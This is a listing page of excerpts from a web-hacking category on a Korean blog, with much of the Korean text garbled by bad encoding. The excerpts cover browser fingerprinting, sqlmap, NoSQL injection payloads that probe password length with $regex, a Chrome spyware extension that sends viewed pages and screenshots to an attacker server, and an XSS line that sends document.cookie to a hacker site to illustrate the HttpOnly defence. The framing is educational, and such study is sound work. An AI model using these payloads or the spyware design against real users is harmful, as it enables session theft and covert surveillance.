728x90 ๋ฐ์ํ ๐์ ๋ณด๋ณด์/์น ๋ณด์20 ์น ํดํน - ๋ธ๋ผ์ฐ์ ํ๊ฑฐํ๋ฆฐํธ ํ์ธ ์ฌ์ดํธ https://browserleaks.com/ BrowserLeaks - Web Browser Fingerprinting - Browsing Privacy BrowserLeaks.com is all about browsing privacy and web browser fingerprinting. Here you will find a gallery of web browser security testing tools that will show you what kind of personal identity data can be leaked while browsing the Internet. browserleaks.com IP ์ฃผ์๋ถํฐ ์์ํด์ FLash Player, Silverlight๊น์ง ๊ฐ์ข ๋ธ๋ผ์ฐ์ ์ .. 2022. 8. 27. ์น ํดํน - ํด๋ผ์ด์ธํธ์ ํ๊ฑฐํ๋ฆฐํธ ํ์ธํ๊ธฐ(ClientJS) const client = new ClientJS(); client.getBrowserData(); client.getFingerprint(); client.getCustomFingerprint(...); client.getUserAgent(); client.getUserAgentLowerCase(); client.getBrowser(); client.getBrowserVersion(); client.getBrowserMajorVersion(); client.isIE(); client.isChrome(); client.isFirefox(); client.isSafari(); client.isOpera(); client.getEngine(); client.getEngineVersion(); client.g.. 2022. 8. 15. ์น ํดํน - sqlmap sqlmap์ ํ์ด์ฌ์ผ๋ก ์์ฑ๋ ์คํ ์์ค SQL Injection ์๋ํ ๋๊ตฌ์ด๋ค. MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access ๋ฑ ๋ค์ํ DBMS๋ค์ ์ง์ํ๊ณ boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band ๊ณต๊ฒฉ ๋ฐฉ์๋ค์ ์ง์ํ๋ค๊ณ ํ๋ค. ์ด๋ ๊ฒ๋ ๋ค์ํ ์ต์ ์ ๋ค ์๋์ ์ผ๋ก ํด์ฃผ๊ธฐ ๋๋ฌธ์ ์ฐ์ง ์์ ์ด์ ๊ฐ ์๋ค. ๋ ์์ธํ ๋ด์ฉ์ ์ง์ ๊ณต์ ์ฌ์ดํธ์์ ํ์ธ ๊ฐ๋ฅ https://sqlmap.org/ sqlmap: automatic SQL injection and database takeover .. 2022. 7. 24. ์น ํดํน - ์น ํจํท ์ ์ก ํ์ฅ ํ๋ก๊ทธ๋จ https://chrome.google.com/webstore/detail/talend-api-tester-free-ed/aejoelaoggembcahagimdiliamlcdmfm Talend API Tester - Free Edition Visually interact with REST, SOAP and HTTP APIs. chrome.google.com ์น ์๋ฒ API๋ฅผ ํ ์คํธํ ๋ ๋์์ด ๋๋ ํ์ฅ ํ๋ก๊ทธ๋จ์ ๋๋ค. ์ด์ ๊น์ง๋ POSTMAN์ ์ฃผ๋ก ์ฌ์ฉํ๋๋ฐ ์ด ๋ ์์ ๋ธ๋ผ์ฐ์ ์์ ์กฐ์์ด ๊ฐ๋ฅํ๋ฉฐ, ์ฌ์ง์ด ๋ธ๋ผ์ฐ์ ๊ฐ ๊ฐ์ง๊ณ ์๋ ์ฟ ํค ๊ฐ๋ ํจ๊ป ์ ๋ฌ์ด ๊ฐ๋ฅํฉ๋๋ค. ํ์ด์ง์ ๋ก๊ทธ์ธ์ด ํ์ํ ๊ฒฝ์ฐ์ ์์ฃผ ํธ๋ฆฌํฉ๋๋ค. ๊ทธ๋ฆฌ๊ณ ์์ฑํ ์์ฒญ ์ ๋ณด๋ค์ ๋ธ๋ผ์ฐ์ ์ ์ ์ฅ๋ ํ ์ ์์. ๋จ์ : ์ํฌ๋ฆฟ ๋ชจ๋์์ ์ฌ์ฉ.. 2021. 12. 9. ์น ํดํน - NoSQL Injection ์กฐ๊ฑด ํํ์ https://book.hacktricks.xyz/pentesting-web/nosql-injection NoSQL injection - HackTricks Brute-force login usernames and passwords from POST login book.hacktricks.xyz [$ne] : ๊ฐ์ง ์์ ๊ฒฝ์ฐ(not equals) [$regex] : ์ ๊ทํํ์ [$eq] : ๊ฐ๋ค(=) [$lt] : ์๋ค() [$lte] : ์๊ฑฐ๋ ๊ฐ๋ค() $regex๋ก ํจ์ค์๋ ๊ธธ์ด ์์๋ด๊ธฐ "password": {"$regex":".{1}"} => admin "password": {"$regex":".{2}"} => admin ... "password": {"$regex":".{5}"} => admin.. 2021. 12. 9. ์น ํดํน - ํฌ๋กฌ ์คํ์ด์จ์ด ํ์ฅ ํ๋ก๊ทธ๋จ , Bad Extension ํฌ๋กฌ ํ์ฅ์๋ฅผ ์ด์ฉํด ๋ธ๋ผ์ฐ์ ์ ์ฉ ์คํ์ด์จ์ด๋ฅผ ๋ง๋ค์ด๋ณด์์ต๋๋ค. ์ฐ์ ๋์์ ์ปดํจํฐ์ ์ค์น๋ฅผ ํ๋ ๊ฑด ์์์ ๋งก๊ธฐ๊ณ , ํ์ฅ ํ๋ก๊ทธ๋จ์ ์ค์นํ๊ฒ ๋๋ฉด ๋ณ ๋ค๋ฅธ ์ด์ ์ฆ์์ ์์ต๋๋ค. ํ์ฅ ํ๋ก๊ทธ๋จ ์์ด์ฝ์ ํด๋ฆญํด๋ ๋ณ ๋ค๋ฅธ ๊ธฐ๋ฅ์ ์์ต๋๋ค. ํ์ง๋ง ๋ง์ฝ ์ ์ ๊ฐ ๋ค๋ฅธ ํ์ด์ง๋ก ์ด๋์ ํ ๊ฒฝ์ฐ๊ฐ ์๊ธฐ๋ฉด ๊ณต๊ฒฉ์์ PC์๋ ์ ์ ๊ฐ ๋์๋ค๋ ํ์ด์ง์ html ํ์ผ๊ณผ ์คํฌ๋ฆฐ์ท ํ์ผ์ ๋ค์ด๋ก๋ ๋ฐ๊ฒ ๋ฉ๋๋ค. ์๋ฆฌ: ๊ณต๊ฒฉ์๊ฐ ํ์ด์ฌ Flask๋ก CDN(์ฝํ ์ธ ์ ์ก ๋คํธ์ํฌ) ์๋ฒ๋ฅผ ์ด๊ฒ ๋ฉ๋๋ค. ์ด ์ ์ฑ ํ์ฅ ํ๋ก๊ทธ๋จ์ ํ์ด์ง๋ฅผ ์ด๋ํ ๋๋ง๋ค ๊ณต๊ฒฉ์์๊ฒ ์๋ฐ์คํฌ๋ฆฝํธ ์ฝํ ์ธ ํ์ผ์ ์๊ตฌ๋ฅผ ํ๊ฒ ๋๊ณ , ๊ณต๊ฒฉ์ ์๋ฒ๋ ์ฝํ ์ธ ๋ฅผ ์ ๊ณต์ ํ๊ฒ ๋ฉ๋๋ค. ๊ทธ ์ ๊ณต๋ฐ๋ ์๋ฐ์คํฌ๋ฆฝํธ ํ์ผ์๋ ๋ฐ์ดํฐ๋ฅผ ์ ์กํ๋ ajax ์คํฌ๋ฆฝํธ์ ๋ฌธ์.. 2021. 12. 8. ์น ํดํน - XSS ๊ณต๊ฒฉ์ผ๋ก document.cookie ์ ๋ณด ๊ฐ์ ธ์ค๊ธฐ ๋ฐฉ์ง(HttpOnly) ํด์ปค๋ ์๋์ฒ๋ผ document.cookie๋ฅผ ํตํด ์ค์ํ ์ฟ ํค ์ ๋ณด๋ค์ ์์งํ๋ ๊ฒ ์ผ๋ฐ์ location.href = 'http://ํด์ปค์ฌ์ดํธ/?cookies=' + document.cookie; ์๋ฒ๊ฐ ํด๋ผ์ด์ธํธ์๊ฒ ์ฟ ํค ๊ฐ์ ์ง์ ํ ๋์ HttpOnly๋ผ๋ ์ต์ ์ ์ถ๊ฐ์์ผ์ฃผ๋ฉด, (HttpOnly๊ฐ Http๋ง ํ์ฉํ๊ณ , Https๋ ํ์ฉํ์ง ์๋๋ค ์ด๊ฒ ์๋๋ค..) ํด๋ผ์ด์ธํธ๊ฐ document.cookie๋ฅผ ์๋ฌด๋ฆฌ ์ถ๋ ฅํด ๋ณด์๋ ํด๋น ์ฟ ํค์ ๋ํ ์ ๋ณด๋ ์ถ๋ ฅ์ด ๋์ง ์๋๋ค. Set-Cookie: ์ฟ ํค๋ช =์ฟ ํค๊ฐ; path=/; HttpOnly HttpOnly ์ค์ ์ ํ ์ฟ ํค๋ ๋ธ๋ผ์ฐ์ ๊ฐ ์ ๊ทผ์ ํ ์ ์๋๋ก ๋๋ฒ๋ฆฐ ๊ฒ. ๋น์ฐํ ์๋ฒ์๊ฒ GET, POST ์์ฒญ๋ฑ์ ํ ๋์๋ HttpOnly ์ค์ ๋ ์ฟ ํค.. 2021. 11. 25. [WEB-HACKING] HTML ์ด๋ฒคํธ ์์ฑ ๋ชจ์ & XSS ์์ฉ ์๋์ ์ด๋ฒคํธ ์์ฑ๋ค์ ๋ชจ๋ Script(์๋ฐ์คํฌ๋ฆฝํธ)์ ๊ฐ๋ง์ ๋ฐ๊ณ ์์ผ๋ฉฐ, ์ฌ์ฉ์๊ฐ ํน์ ์กฐ๊ฑด์ ๋ง์กฑํ๊ฒ ๋๋ฉด ์ด๋ฒคํธ๊ฐ ๋ฐ์์ ํ๊ฒ ๋ฉ๋๋ค. [Window Event Attributes] onafterprint onbeforeprint onbeforeunload onerror onhashchange onload onmessage onoffline ononline onpagehide onpageshow onpopstate onresize onstorage onunload [Form Events] onblur onchange oncontextmenu onfocus oninput oninvalid onreset onsearch onselect onsubmit [Mouse Events] onclick ond.. 2021. 11. 15. ์ด์ 1 2 ๋ค์ 728x90 ๋ฐ์ํ